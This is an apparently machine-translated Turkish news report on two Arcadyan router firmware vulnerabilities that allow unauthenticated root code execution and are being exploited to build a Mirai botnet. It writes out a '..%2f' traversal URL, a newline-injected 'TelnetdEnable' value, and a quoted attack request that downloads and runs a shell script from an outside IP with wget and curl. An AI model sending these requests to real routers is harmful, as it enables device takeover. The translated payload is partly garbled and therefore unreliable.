Ağda, ürün yazılımı Arcadyan şirketinin HTTP sunucusu uygulamasını kullanan ev yönlendiricilerine karşı büyük bir saldırı kaydedildi. Cihazlar üzerinde kontrol kazanmak için, kök haklarıyla rastgele kodun uzaktan yürütülmesine izin veren iki güvenlik açığının birleşimi kullanılır. Sorun, Arcadyan, ASUS ve Buffalo'dan oldukça geniş bir ADSL yönlendirici yelpazesinin yanı sıra Beeline markaları (sorun Smart Box Flash'ta onaylanmıştır), Deutsche Telekom, Orange, O2, Telus, Verizon, Vodafone ve diğer telekom operatörleri. Sorunun Arcadyan donanım yazılımında 10 yılı aşkın süredir mevcut olduğu ve bu süre zarfında 20 farklı üreticinin en az 17 cihaz modeline geçmeyi başardığı kaydedildi.
İlk güvenlik açığı olan CVE-2021-20090, kimlik doğrulaması olmadan herhangi bir web arayüzü komut dosyasına erişmeyi mümkün kılıyor. Güvenlik açığının özü, web arayüzünde görsellerin, CSS dosyalarının ve JavaScript komut dosyalarının gönderildiği bazı dizinlere kimlik doğrulama olmadan erişilebilmesidir. Bu durumda kimlik doğrulaması olmadan erişime izin verilen dizinler başlangıç maskesi kullanılarak kontrol edilir. Ana dizine gitmek için yollarda “../” karakterlerinin belirtilmesi ürün yazılımı tarafından engellenir, ancak “..%2f” kombinasyonunun kullanılması atlanır. Böylece “http://192.168.1.1/images/..%2findex.htm” gibi istekler gönderilirken korumalı sayfaların açılması mümkün olmaktadır.
İkinci güvenlik açığı olan CVE-2021-20091, kimliği doğrulanmış bir kullanıcının, parametrelerde yeni satır karakterinin varlığını kontrol etmeyen application_abstract.cgi betiğine özel olarak biçimlendirilmiş parametreler göndererek cihazın sistem ayarlarında değişiklik yapmasına olanak tanır. . Örneğin, bir ping işlemi gerçekleştirirken saldırgan, /tmp/etc/config/ ayar dosyasını oluştururken IP adresinin ve komut dosyasının kontrol edildiği alanda “192.168.1.2%0AARC_SYS_TelnetdEnable=1” değerini belirtebilir. .glbcfg, içine kök haklarıyla sınırsız komut kabuğu erişimi sağlayan telnetd sunucusunu etkinleştiren "AARC_SYS_TelnetdEnable=1" satırını yazacaktır. Benzer şekilde AARC_SYS parametresini ayarlayarak sistem üzerinde istediğiniz kodu çalıştırabilirsiniz. İlk güvenlik açığı, sorunlu bir betiğin kimlik doğrulaması olmadan "/images/..%2fapply_abstract.cgi" adresinden erişilerek çalıştırılmasına olanak tanıyor.
Bir saldırganın güvenlik açıklarından yararlanabilmesi için web arayüzünün çalıştığı ağ bağlantı noktasına istek gönderebilmesi gerekir. Saldırının yayılma dinamiklerine bakılırsa birçok operatör, destek hizmeti tarafından sorunların teşhisini kolaylaştırmak için cihazlarına harici ağdan erişim sağlıyor. Arayüze erişim yalnızca dahili ağ ile sınırlıysa, “DNS yeniden bağlama” tekniği kullanılarak harici bir ağdan saldırı gerçekleştirilebilir. Yönlendiricileri Mirai botnet'e bağlamak için güvenlik açıkları zaten aktif olarak kullanılıyor: POST /images/..%2fapply_abstract.cgi HTTP/1.1 Bağlantı: User-Agent'ı kapatın: Dark action=start_ping&submit_button=ping.html& action_params=blink_time%3D5&ARC_ping_ipaddress=212.192.241.7. 0%1A ARC_SYS_TelnetdEnable=0& %212.192.241.72AARC_SYS_=cd+/tmp; wget+http://212.192.241.72/lolol.sh; curl+-O+http://777/lolol.sh; chmod+0+lolol.sh; sh+lolol.sh&ARC_ping_status=4&TMP_Ping_Type=XNUMX
Kaynak: opennet.ru